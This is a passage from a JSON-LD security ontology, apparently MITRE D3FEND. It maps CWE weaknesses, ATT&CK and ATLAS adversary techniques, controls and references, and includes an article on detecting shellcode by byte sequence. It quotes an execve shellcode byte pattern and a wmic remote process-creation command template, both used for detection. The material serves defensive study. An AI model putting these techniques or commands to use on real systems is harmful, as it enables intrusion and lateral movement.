      "d3f:definition": "Analyzing sequences of bytes and determining if they likely represent malicious shellcode.",
      "d3f:kb-article": "## How it works\n\nBytes are analyzed as if they are machine code instructions, and such instructions that are a common component of known shellcode are noted, such as stack pivots, reads from a Memory Address Table, and system calls for functions that disable protections or execute code.  For example, the x86 instruction `b0 0b: mov $11, %ax`, with no further alterations to the `%ax` register, followed by `cd 80: syscall` executes the system call `execve()` in the Linux kernel, which replaces the current process with another one specified -- this is a common action in shellcode, so this sequence would be flagged.\n\nThis technique detects shellcode despite whether or not it would cause a buffer overflow in the target binary.\n\nIf the sequence of bytes contains a sequence similar to that used in malicious shellcode, the entire byte sequence is flagged and a follow-on technique may be invoked.\n\n## Considerations\n\n### False Negatives\nIf the shellcode instructions are far apart, simple implementations might not detect the shellcode.\n\nDue to the nature of assembly instructions not having a defined start or end, implementations which do not process all start sequences (for example, when they a find byte sequence of interest, continue scanning forwards from the end of it) might not detect the shellcode.\n\nThis technique might not detect more complex or obfuscated instructions.  For that purpose, Dynamic Analysis or Emulated File Analysis could assist by analyzing the actual instruction function.\n\nThis technique may not detect self-modifying code.  To make it harder for a process to modify itself, Process Segment Execution Prevention should be used, while noting its considerations.\n\nThis technique might not detect malicious shellcode which reuses instructions in the target binary for malicious effect, as memory references in the presumed assembly code are not dereferenced.  Dynamic Analysis and Emulated File Analysis, when set up properly to fork from the running target binary, might detect this.  Process Segment Execution Prevention combined with Segment Address Offset Randomization frequently makes introduction of shellcode through overwriting a saved return pointer more difficult.  Call stack depth analysis might detect excessive reuse of instructions in the target binary.  Shadow Stack Frames might detect that a stack frame's return address has changed and Stack Frame Canary Verification might detect that the stack frame's return address was overwritten.  Other heuristic methods might detect jump-oriented programming shellcode.\n\nWith inserting code directly, that it is not a buffer overflow, and just some place where code is executed either to a file or a write-what-where, the buffer overflow mitigations do not help.  Behavioral analysis could detect this, or proper access control could mitigate this.\n\n### False Positives\n\nByte sequences containing code that is never used as machine code are still analyzed and flagged for anomalies, and [eventually](http://mathforum.org/library/drmath/view/55871.html), it is likely that an attack sequence will arise from the sheer volume of bytes transmitted.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Network-BasedBufferOverflowDetectionByExploitCodeAnalysis_InformationSecurityResearchCentre"
        },
        {
          "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation"
        }
      ],
      "d3f:synonym": "Shellcode Transmission Detection",
      "rdfs:label": "Byte Sequence Emulation",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTrafficAnalysis"
      }
    },
    {
      "@id": "d3f:CWE-1110",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1110",
      "d3f:definition": "The product's design documentation does not adequately describe control flow, data flow, system initialization, relationships between tasks, components, rationales, or other important aspects of the design.",
      "rdfs:label": "Incomplete Design Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:T1176.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1176.001",
      "d3f:definition": "Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)",
      "rdfs:label": "Browser Extensions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1176"
      }
    },
    {
      "@id": "d3f:T1556.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.001",
      "d3f:definition": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.",
      "rdfs:label": "Domain Controller Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-1304",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1304",
      "d3f:definition": "The product performs a power save/restore operation, but it does not ensure that the integrity of the configuration state is maintained and/or verified between the beginning and ending of the operation.",
      "rdfs:label": "Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-763",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-763",
      "d3f:definition": "The product attempts to return a memory resource to the system, but it calls the wrong release function or calls the appropriate release function incorrectly.",
      "rdfs:label": "Release of Invalid Pointer or Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:CWE-165",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-165",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Internal Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-164"
      }
    },
    {
      "@id": "d3f:DS0029",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)",
      "d3f:exactly": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Network Traffic Content component",
      "rdfs:label": "Network Traffic (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-002618_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization removes organization-defined firmware components (e.g., previous versions) after updated versions have been installed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002618"
    },
    {
      "@id": "d3f:created",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of creation of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date created"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:DigitalEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital event represents an observable occurrence, action, or state change within digital systems, networks, or their interactions. These events are characterized by their impact on the confidentiality, integrity, availability, or functionality of digital resources, processes, identities, or communications. Digital events are essential units of information in cybersecurity, serving as the basis for detecting threats, analyzing anomalies, and orchestrating responses in complex, interconnected environments.",
      "rdfs:label": "Digital Event",
      "rdfs:subClassOf": {
        "@id": "d3f:Event"
      }
    },
    {
      "@id": "d3f:Reference-MaliciousRelayDetectionOnNetworks_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150264083A1"
      },
      "d3f:kb-abstract": "A system and method for detecting malicious relay communications is disclosed. Network communications can be received and analyzed using such network components as a network switch. The received traffic can be parsed into sessions. Relay metadata can be extracted from the sessions and further be used to categorize the sessions into one or more types of relay metadata behaviors. Once a significant amount of sessions are detected an alarm may be triggered and/or alarm data may be generated for analysis by network security administrators.",
      "d3f:kb-author": "Ryan James PRENGER; Nicolas BEAUCHESNE; Karl Matthew LYNN",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting relay networks, i.e. an attacker outside of the organization's network takes control of an internal host to be used as a source of attacks against other internal targets or exfiltrate data out of the organization. In this defensive technique, metadata from collected network packet captures is extracted to categorize network sessions using known relay behaviors. Information such as the number of bytes sent to and from a potential internal relay host, time of session initiation, packet contents, packet size, flow direction, and packet arrival time statistics are used to categorize the sessions and identify relay behavior. This technique assumes that relay network connections' inter-packet arrival times exhibit a high degree of variance in comparison to standard client-to-server connections. If enough evidence of relay behavior is gathered about a given internal host, the host is identified as suspicious and an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RelayPatternAnalysis"
      },
      "d3f:kb-reference-title": "Malicious relay detection on networks",
      "rdfs:label": "Reference - Malicious relay detection on networks - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T1200",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1200",
      "d3f:connects": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:definition": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.",
      "rdfs:label": "Hardware Additions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N3712d9bd53a54f49b71f5d065dd192ac"
        }
      ]
    },
    {
      "@id": "_:N3712d9bd53a54f49b71f5d065dd192ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T1566.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1566.002",
      "d3f:definition": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.",
      "d3f:produces": [
        {
          "@id": "d3f:Email"
        },
        {
          "@id": "d3f:InboundInternetMailTraffic"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Spearphishing Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1566"
        },
        {
          "@id": "_:Ned84c7d6d96547fb881eafae1cd33b4e"
        },
        {
          "@id": "_:N17fcd30dbf9b4846a176b4953c296fe8"
        },
        {
          "@id": "_:Nfd9360926ca84691ac4ca8b1b411df8d"
        }
      ]
    },
    {
      "@id": "_:Ned84c7d6d96547fb881eafae1cd33b4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:N17fcd30dbf9b4846a176b4953c296fe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetMailTraffic"
      }
    },
    {
      "@id": "_:Nfd9360926ca84691ac4ca8b1b411df8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:use-limits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x use-limits y: The entity x specifies a designated number of uses beyond which some entity y cannot function or must be terminated.",
      "rdfs:label": "use-limits",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13781154-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:limits"
      }
    },
    {
      "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-03-002/"
      },
      "d3f:kb-abstract": "Adversaries may use Windows Management Instrumentation (WMI) to move laterally, by launching executables remotely.The analytic CAR-2014-12-001 describes how to detect these processes with network traffic monitoring and process monitoring on the target host. However, if the command line utility wmic.exe is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like wmic.exe /node:\"\\<hostname\\>\" process call create \"\\<command line\\>\". It is possible to also connect via IP address, in which case the string \"\\<hostname\\>\" would instead look like IP Address.\n\nAlthough this analytic was created after CAR-2014-12-001, it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility PowerShell.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2016-03-002: Create Remote Process via WMIC",
      "rdfs:label": "Reference - CAR-2016-03-002: Create Remote Process via WMIC - MITRE"
    },
    {
      "@id": "d3f:CWE-75",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-75",
      "d3f:definition": "The product does not adequately filter user-controlled input for special elements with control implications.",
      "rdfs:label": "Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Automated Patch Management Tools",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "SI-2(4)"
    },
    {
      "@id": "_:N098d37dce77c4807a6e814485e83f584",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Agent"
          },
          {
            "@id": "d3f:Artifact"
          },
          {
            "@id": "d3f:Event"
          },
          {
            "@id": "d3f:Goal"
          },
          {
            "@id": "d3f:Plan"
          },
          {
            "@id": "d3f:Weakness"
          }
        ]
      }
    },
    {
      "@id": "d3f:FileContentBlockData",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The actual content or main data within a file or data block.",
      "rdfs:label": "File Content Block Data",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:FileSystemMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Metadata about the files and directories in a file system.  For example file name, file length, time modified, group and user ids, and other file attributes.",
      "rdfs:label": "File System Metadata",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/File_system#Metadata"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Metadata"
      }
    },
    {
      "@id": "d3f:T1480.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480.002",
      "d3f:definition": "Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)",
      "rdfs:label": "Mutual Exclusion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1480"
      }
    },
    {
      "@id": "d3f:DS0037",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications",
      "rdfs:comment": "This data source captures events relating to certificates and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Certificate (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1661",
      "@type": "owl:Class",
      "d3f:attack-id": "T1661",
      "d3f:definition": "An adversary may push an update to a previously benign application to add malicious code. This can be accomplished by pushing an initially benign, functional application to a trusted application store, such as the Google Play Store or the Apple App Store. This allows the adversary to establish a trusted userbase that may grant permissions to the application prior to the introduction of malicious code. Then, an application update could be pushed to introduce malicious code.(Citation: android_app_breaking_bad)",
      "rdfs:label": "Application Versioning - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Application Versioning"
    },
    {
      "@id": "d3f:CWE-832",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-832",
      "d3f:definition": "The product attempts to unlock a resource that is not locked.",
      "rdfs:label": "Unlock of a Resource that is not Locked",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:AML.T0043.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.001",
      "d3f:definition": "In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.\nWith black-box attacks, the adversary may be using an API that the victim is monitoring.\nThese attacks are generally less effective and require more inferences than [White-Box Optimization](/techniques/AML.T0043.000) attacks, but they require much less access.",
      "rdfs:label": "Black-Box Optimization - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Black-Box Optimization"
    },
    {
      "@id": "d3f:T1003.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1003.005",
      "d3f:definition": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)",
      "d3f:may-modify": {
        "@id": "d3f:Log"
      },
      "rdfs:label": "Cached Domain Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N3e9b307143d643c1a769a0a8662e3d8b"
        },
        {
          "@id": "_:N526552d49cd741d4aedbc69a7b35616a"
        }
      ]
    },
    {
      "@id": "_:N3e9b307143d643c1a769a0a8662e3d8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "_:N526552d49cd741d4aedbc69a7b35616a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:CCI-001425_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to change the value of associated security attributes.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001425"
    },
    {
      "@id": "d3f:CWE-192",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-192",
      "d3f:definition": "Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types.",
      "rdfs:label": "Integer Coercion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:DNSLookup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Domain Name System (DNS) lookup is a record returned from a DNS resolver after querying a DNS name server.  Typically considered an A or AAAA record, where a domain name is resolved to an IPv4 or IPv6 address, respectively.",
      "rdfs:label": "DNS Lookup",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_Name_System"
        },
        {
          "@id": "dbr:List_of_DNS_record_types"
        },
        {
          "@id": "https://schema.ocsf.io/objects/dns_query"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:IntrinsicallySemi-supervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ISSL",
      "d3f:definition": "These methods directly optimize an objective function with components for labeled and unlabeled samples and do not rely on any intermediate steps or supervised base learners. Basically, these methods are extension of existing supervised methods to include the effect of unlabeled data samples in the objective function.",
      "d3f:kb-article": "## References\nBeginner's Guide to Semi-Supervised Learning. Jashish Blog.  [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/).",
      "rdfs:label": "Intrinsically Semi-supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:UDPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the User Datagram Protocol (UDP), providing a connectionless datagram service with minimal protocol mechanisms.",
      "rdfs:label": "UDP Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TransportLayerEvent"
      }
    },
    {
      "@id": "d3f:T1496",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496",
      "d3f:definition": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Resource Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1555.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.006",
      "d3f:definition": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.",
      "rdfs:label": "Cloud Secrets Management Stores",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:CWE-524",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-524",
      "d3f:definition": "The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere.",
      "rdfs:label": "Use of Cache Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOTMFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOTM File"
    },
    {
      "@id": "d3f:CWE-918",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-918",
      "d3f:definition": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.",
      "d3f:synonym": [
        "SSRF",
        "XSPA"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Server-Side Request Forgery (SSRF)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-441"
        },
        {
          "@id": "_:Nfb2a6a7b8f104bc08309a3836fe89e8f"
        }
      ]
    },
    {
      "@id": "_:Nfb2a6a7b8f104bc08309a3836fe89e8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CWE-135",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-135",
      "d3f:definition": "The product does not correctly calculate the length of strings that can contain wide or multi-byte characters.",
      "rdfs:label": "Incorrect Calculation of Multi-Byte String Length",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T1521",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521",
      "d3f:definition": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.",
      "rdfs:label": "Encrypted Channel - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Encrypted Channel"
    },
    {
      "@id": "d3f:T1456",
      "@type": "owl:Class",
      "d3f:attack-id": "T1456",
      "d3f:definition": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).",
      "rdfs:label": "Drive-By Compromise - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-By Compromise"
    },
    {
      "@id": "d3f:CCI-001100_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents public access into the organization's internal networks except as appropriately mediated by managed interfaces employing boundary protection devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001100"
    },
    {
      "@id": "d3f:CodeRepository",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A code repository is a form of database where code, typically source code, is stored and managed.  In revision control systems, a repository is a data structure that stores metadata for a set of files or directory structure. Depending on whether the version control system in use is distributed like (Git or Mercurial) or centralized like (Subversion, CVS, or Perforce), the whole set of information in the repository may be duplicated on every user's system or may be maintained on a single server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Repository_(version_control)"
      },
      "rdfs:label": "Code Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      },
      "skos:altLabel": [
        "Repository",
        "Version Control Repository"
      ]
    },
    {
      "@id": "d3f:CWE-1419",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1419",
      "d3f:definition": "The product attempts to initialize a resource but does not correctly do so, which might leave the resource in an unexpected, incorrect, or insecure state when it is accessed.",
      "rdfs:label": "Incorrect Initialization of Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:GNSSTimeRecord",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS Time Record is an information content entity encoded in a GNSS signal that represents the transmission time of that signal as determined by the transmitting satellite, expressed relative to a constellation-specific time standard and epoch.",
      "rdfs:label": "GNSS Time Record",
      "rdfs:seeAlso": {
        "@id": "https://gssc.esa.int/navipedia/index.php/Time_References_in_GNSS"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:TimeRecord"
      }
    },
    {
      "@id": "d3f:CCI-002284_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the integrity of organization-defined security attributes associated with organization-defined objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002284"
    },
    {
      "@id": "d3f:T0801",
      "@type": "owl:Class",
      "d3f:attack-id": "T0801",
      "d3f:definition": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.",
      "rdfs:label": "Monitor Process State - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Monitor Process State"
    },
    {
      "@id": "d3f:AML.TA0000",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0000",
      "d3f:definition": "The adversary is attempting to gain some level of access to an AI model.\n\nAI Model Access enables techniques that use various types of access to the AI model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.\nThe level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the AI model.\nThe adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.\n\nAccess to an AI model may require access to the system housing the model, the model may be publicly accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.",
      "rdfs:label": "AI Model Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0000"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "AI Model Access"
    },
    {
      "@id": "d3f:CWE-1103",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1103",
      "d3f:definition": "The product relies on third-party components that do not provide equivalent functionality across all desirable platforms.",
      "rdfs:label": "Use of Platform-Dependent Third Party Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:RD-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.01",
      "d3f:definition": "Compromising a mission’s own ground system grants the adversary preconfigured access to TT&C and automation. High-value targets include operator workstations, mission control servers, procedure libraries, scheduler/orchestration services, key-loading tools and HSMs, antenna control systems, timing/distribution, and RF modems/baseband units. Typical paths: phishing an operator or contractor, abusing remote-support channels, pivoting from enterprise IT to ops, exploiting unpatched services on enclave gateways, or harvesting credentials from poorly segmented test environments. Once inside, an actor can stage malicious procedures, alter rate/size limits, manipulate pass schedules, downgrade authentication in maintenance modes, or quietly siphon telemetry and ephemerides to refine later attacks.",
      "rdfs:label": "Mission-Operated Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
